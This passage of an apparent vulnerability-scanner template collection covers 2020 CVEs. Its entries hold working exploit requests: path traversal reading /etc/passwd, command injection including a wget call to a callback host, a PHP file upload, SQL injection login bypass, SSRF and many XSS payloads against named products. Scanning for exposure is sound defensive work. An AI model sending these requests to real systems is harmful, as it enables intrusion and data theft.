{{randkey}}\n\n<clipermission></clipermission>\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 